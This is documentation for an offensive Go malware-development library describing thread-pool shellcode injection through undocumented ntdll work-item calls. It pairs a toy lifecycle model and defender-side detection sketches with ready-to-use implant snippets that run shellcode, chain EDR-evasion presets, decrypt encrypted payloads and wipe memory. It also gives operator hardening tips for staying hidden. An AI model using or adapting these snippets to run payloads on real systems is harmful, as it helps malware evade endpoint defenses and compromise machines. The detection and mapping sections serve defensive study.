Thread pool injection
New to maldev injection? Read the injection/README.md vocabulary callout first.
TL;DR
Drop a work item onto the process's default thread pool via the
undocumented TpAllocWork / TpPostWork / TpReleaseWork triplet in
ntdll. An idle worker thread that already exists picks the item up
and runs the shellcode as a normal callback. No CreateThread, no
NtCreateThreadEx, no APC. Local-only.
| Trait | Value |
|---|---|
| Target class | Local (current process) |
| Creates a new thread? | No — reuses one of the always-running pool workers |
| Uses WriteProcessMemory? | No: the shellcode is copied into memory the implant allocates in its own process |
| Stealth tier | High — no CreateThread / QueueAPC / SetContext call enters EDR's view |
| CET-affected? | Pool dispatcher may enforce ENDBR64 on Win11 24H2+. Use inject.ThreadPoolExecCET for auto-wrapping. |
When to pick a different method:
- Want callback-via-existing-API rather than work-queue? → Callback execution.
- Need local (self) execution but want an explicit thread rather than the pool? → EtwpCreateEtwThread.
- Need to inject into a different process? → ThreadPool is Local-only. See CreateRemoteThread / Section Mapping.
Primer
Every Windows process has a default thread pool — a small ring of
worker threads created by RtlpInitializeThreadPool early in process
startup. The pool's purpose is to dispatch arbitrary work items
submitted by kernel32!QueueUserWorkItem, ntdll!TpPostWork, and the
modern CreateThreadpoolWork family. The implant abuses the
ntdll-private layer: TpAllocWork(&work, callback, ctx, env) builds a
TP_WORK object whose callback pointer is the shellcode, TpPostWork
pushes it onto the queue, and one of the existing workers dequeues
and dispatches it.
The result is execution on a thread that the implant did not create
and the EDR did not see being created. The same TP_WORK object is
the textbook plumbing every well-behaved Windows process uses dozens of
times per second; the only anomaly is the callback target itself.
How it works
```mermaid
sequenceDiagram
participant Impl as "Implant"
participant Nt as "ntdll"
participant Pool as "Default thread pool"
participant W as "Worker thread"
Impl->>Impl: VirtualAlloc(RW) + memcpy
Impl->>Impl: VirtualProtect(RX)
Impl->>Nt: TpAllocWork(&work, sc, 0, 0)
Nt-->>Impl: TP_WORK*
Impl->>Nt: TpPostWork(work)
Nt->>Pool: enqueue
Pool->>W: dispatch
W->>W: shellcode runs as callback
Impl->>Nt: TpWaitForWork(work, false)
Note over Impl: blocks until callback returns
Impl->>Nt: TpReleaseWork(work)
```
Steps:
- Allocate / write / protect in the current process: RW first, then RX.
- TpAllocWork: register the shellcode as the callback.
- TpPostWork: submit the work item.
- Worker dispatch: an existing pool worker dequeues the item and calls the callback (the shellcode).
- TpWaitForWork: block until the callback returns, so that TpReleaseWork does not free the object underneath a running callback.
- TpReleaseWork: clean up.
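The post / wait / release ordering in these steps can be modelled in plain Go. This is a toy, not the ntdll implementation: toyPool, toyWork, allocWork, postWork and waitForWork are hypothetical names chosen to mirror TpAllocWork, TpPostWork and TpWaitForWork, and a goroutine pool stands in for the default thread pool. It only illustrates two properties the steps rely on: the workers exist before anything is posted, and waiting must come before release.

```go
package main

import (
	"fmt"
	"sync"
)

// toyWork stands in for TP_WORK: a callback, its context, and a counter of
// posted-but-unfinished invocations. It models the lifecycle only.
type toyWork struct {
	cb      func(ctx any)
	ctx     any
	pending sync.WaitGroup
}

// toyPool stands in for the default pool: its workers are started once and
// then sit idle on the queue before anything is posted.
type toyPool struct {
	queue chan *toyWork
}

func newToyPool(workers int) *toyPool {
	p := &toyPool{queue: make(chan *toyWork)}
	for i := 0; i < workers; i++ {
		go func() {
			for w := range p.queue {
				w.cb(w.ctx)      // dispatch: an existing worker calls the callback
				w.pending.Done() // signal completion to any waiter
			}
		}()
	}
	return p
}

// allocWork models TpAllocWork: bind callback and context; nothing runs yet.
func allocWork(cb func(any), ctx any) *toyWork {
	return &toyWork{cb: cb, ctx: ctx}
}

// postWork models TpPostWork: hand the item to whichever worker is idle.
func (p *toyPool) postWork(w *toyWork) {
	w.pending.Add(1)
	p.queue <- w
}

// waitForWork models TpWaitForWork(work, false): block until every posted
// invocation of w has returned.
func waitForWork(w *toyWork) {
	w.pending.Wait()
}

func main() {
	p := newToyPool(2)
	var msg string
	w := allocWork(func(ctx any) {
		msg = fmt.Sprintf("callback ran with ctx=%v", ctx)
	}, 42)
	p.postWork(w)
	waitForWork(w) // only after this returns is it safe to release w
	fmt.Println(msg)
	// TpReleaseWork has no toy counterpart: the garbage collector frees w
	// once it becomes unreachable.
}
```

Dropping the waitForWork call turns the read of msg into a data race, which is the toy analogue of TpReleaseWork freeing the TP_WORK object while the callback is still running.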
API → godoc
pkg.go.dev/github.com/oioio-space/maldev/inject is the authoritative
reference for every exported symbol. This page teaches the
concepts; the godoc is the specification.
Examples
Simple
```go
import "github.com/oioio-space/maldev/inject"

if err := inject.ThreadPoolExec(shellcode); err != nil {
	return err
}
```
Simple — future-proofed (CET-aware)
```go
// Same code, no per-call decisions. Wraps with cet.Wrap when
// cet.Enforced() flips true on a future Win build; no-op today.
if err := inject.ThreadPoolExecCET(shellcode); err != nil {
	return err
}
```
Composed (ModuleStomp + manual TpAllocWork)
ThreadPoolExec is a one-shot helper. To make the callback target
image-backed, stomp first and call TpAllocWork manually — see
inject/threadpool_windows.go
for the call shape:
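```go
import "github.com/oioio-space/maldev/inject"

addr, err := inject.ModuleStomp("msftedit.dll", shellcode)
if err != nil {
	return err
}
// The manual TpAllocWork(addr, ...) dispatch is in
// inject/threadpool_windows.go; see the source for the full snippet.
// The one-shot helper below dispatches addr through RtlRegisterWait
// (the callback-execution path), not through the TP_WORK queue.
return inject.ExecuteCallback(addr, inject.CallbackRtlRegisterWait)
```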
Advanced (chain with evasion preset)
```go
import (
	"github.com/oioio-space/maldev/evasion"
	"github.com/oioio-space/maldev/evasion/preset"
	"github.com/oioio-space/maldev/inject"
)

_ = evasion.ApplyAll(preset.Stealth(), nil)
return inject.ThreadPoolExec(shellcode)
```
Complex (decrypt + thread-pool + wipe)
```go
import (
	"github.com/oioio-space/maldev/cleanup/memory"
	"github.com/oioio-space/maldev/crypto"
	"github.com/oioio-space/maldev/evasion"
	"github.com/oioio-space/maldev/evasion/preset"
	"github.com/oioio-space/maldev/inject"
)

_ = evasion.ApplyAll(preset.Stealth(), nil)
shellcode, err := crypto.DecryptAESGCM(aesKey, encrypted)
if err != nil {
	return err
}
memory.SecureZero(aesKey)
if err := inject.ThreadPoolExec(shellcode); err != nil {
	return err
}
memory.SecureZero(shellcode)
```
OPSEC & Detection
| Artefact | Where defenders look |
|---|---|
| TP_WORK callback pointer outside any image | EDR memory scanners walk active pool work items (CrowdStrike Falcon Sensor, MDE Live Response) |
| RW → RX flip in current process | NtProtectVirtualMemory telemetry — every modern EDR keys on the protection transition |
| Pool worker stack containing addresses outside any module | Stack-walking telemetry on the thread-pool dispatcher |
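To make the "RW → RX flip" row concrete, here is a minimal defender-side sketch of the pattern that telemetry keys on. It assumes a hypothetical, simplified event record (protectEvent) for each protection change; the constant values are the winnt.h page-protection values, and the filter (non-image region, previously writable and not executable, now executable) is one illustrative rule, not any vendor's detection logic.

```go
package main

import "fmt"

// Memory-protection constants; values as defined in winnt.h.
const (
	pageReadOnly         uint32 = 0x02 // PAGE_READONLY
	pageReadWrite        uint32 = 0x04 // PAGE_READWRITE
	pageWriteCopy        uint32 = 0x08 // PAGE_WRITECOPY
	pageExecute          uint32 = 0x10 // PAGE_EXECUTE
	pageExecuteRead      uint32 = 0x20 // PAGE_EXECUTE_READ
	pageExecuteReadWrite uint32 = 0x40 // PAGE_EXECUTE_READWRITE
	pageExecuteWriteCopy uint32 = 0x80 // PAGE_EXECUTE_WRITECOPY
)

// protectEvent is a hypothetical, simplified telemetry record for one
// NtProtectVirtualMemory call; real sensors carry far more context.
type protectEvent struct {
	Base     uintptr
	Old, New uint32
	Image    bool // true if the region is backed by a mapped image
}

func writable(p uint32) bool {
	return p&(pageReadWrite|pageWriteCopy|pageExecuteReadWrite|pageExecuteWriteCopy) != 0
}

func executable(p uint32) bool {
	return p&(pageExecute|pageExecuteRead|pageExecuteReadWrite|pageExecuteWriteCopy) != 0
}

// flagWriteThenExec returns the base of every non-image region that went
// from writable-but-not-executable to executable: the RW -> RX pattern.
func flagWriteThenExec(events []protectEvent) []uintptr {
	var hits []uintptr
	for _, e := range events {
		if !e.Image && writable(e.Old) && !executable(e.Old) && executable(e.New) {
			hits = append(hits, e.Base)
		}
	}
	return hits
}

func main() {
	events := []protectEvent{
		{Base: 0x10000, Old: pageReadWrite, New: pageExecuteRead},              // private RW -> RX: flagged
		{Base: 0x20000, Old: pageReadOnly, New: pageExecuteRead},               // never writable: ignored
		{Base: 0x30000, Old: pageReadWrite, New: pageExecuteRead, Image: true}, // image page: ignored
	}
	fmt.Printf("%#x\n", flagWriteThenExec(events))
}
```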
D3FEND counters:
- D3-PCSV — verifies the callback against image segments.
- D3-EAL — WDAC blocks RX flips outside images.
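The first OPSEC row and D3-PCSV both come down to one question: does the callback pointer fall inside a loaded image? A minimal sketch of that range test, assuming the caller already has the module list (on Windows, EnumProcessModules plus GetModuleInformation report each image's base and SizeOfImage). The module type and owningModule are hypothetical names, and the names and addresses in main are made up.

```go
package main

import "fmt"

// module is one loaded image: a name plus its [Base, Base+Size) range,
// e.g. MODULEINFO.lpBaseOfDll and MODULEINFO.SizeOfImage on Windows.
type module struct {
	Name       string
	Base, Size uintptr
}

// owningModule reports which image, if any, contains addr. A callback
// pointer with no owner is the "outside any image" artefact.
func owningModule(addr uintptr, mods []module) (string, bool) {
	for _, m := range mods {
		// addr-m.Base cannot underflow because addr >= m.Base is checked first.
		if addr >= m.Base && addr-m.Base < m.Size {
			return m.Name, true
		}
	}
	return "", false
}

func main() {
	mods := []module{
		{Name: "ntdll.dll", Base: 0x10000000, Size: 0x1f0000},
		{Name: "msftedit.dll", Base: 0x20000000, Size: 0x80000},
	}
	for _, cb := range []uintptr{0x20001234, 0x30000000} {
		if name, ok := owningModule(cb, mods); ok {
			fmt.Printf("%#x is image-backed (%s)\n", cb, name)
		} else {
			fmt.Printf("%#x is outside any image: flag it\n", cb)
		}
	}
}
```

A pointer returned by ModuleStomp sits inside msftedit.dll's range and passes this range check on its own; catching it needs a further comparison of the in-memory code against the on-disk image.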
Hardening for the operator: pair with ModuleStomp
so the callback pointer is image-backed; spread allocations across
multiple smaller pages to reduce signature surface; sleep-mask the
shellcode region between activations
(evasion/sleepmask).
MITRE ATT&CK
| T-ID | Name | Sub-coverage | D3FEND counter |
|---|---|---|---|
| T1055 | Process Injection | thread-pool variant, no thread creation (no dedicated sub-technique; T1055.001 is DLL Injection) | D3-PCSV |
Limitations
- Local only. Targets the current process's pool. There is no cross-process variant: the TP_WORK object lives in the calling process.
- Synchronous via TpWaitForWork. The helper blocks until the callback returns. Long-running shellcode should detach internally (spawn a fiber or thread).
- CET dispatcher is not currently enforced on the thread-pool path (unlike RtlRegisterWait, which is). Plain ThreadPoolExec works as-is. The future-proof ThreadPoolExecCET wrapper auto-prepends ENDBR64 via cet.Wrap when cet.Enforced() returns true, so an implant built against this helper keeps working if Microsoft makes ENDBR64 mandatory on this dispatcher. On hosts without enforcement the wrapper is a no-op; where it does wrap, the cost is a 4-byte shellcode prefix.
- Region not freed. The RX page persists until process exit unless the implant calls cleanup/memory.WipeAndFree.
- Undocumented APIs. TpAllocWork, TpPostWork and TpReleaseWork are not in the SDK; future Windows builds may rename or relocate them.
See also
- Callback execution: the broader family; thread pool is the worker-thread variant.
- Module Stomping: pair with it to make the callback pointer image-backed.
- evasion/sleepmask: mask the RX region between dispatches.
- Modexp, Calling Conventions in Windows: original public write-up of TpAllocWork-based injection.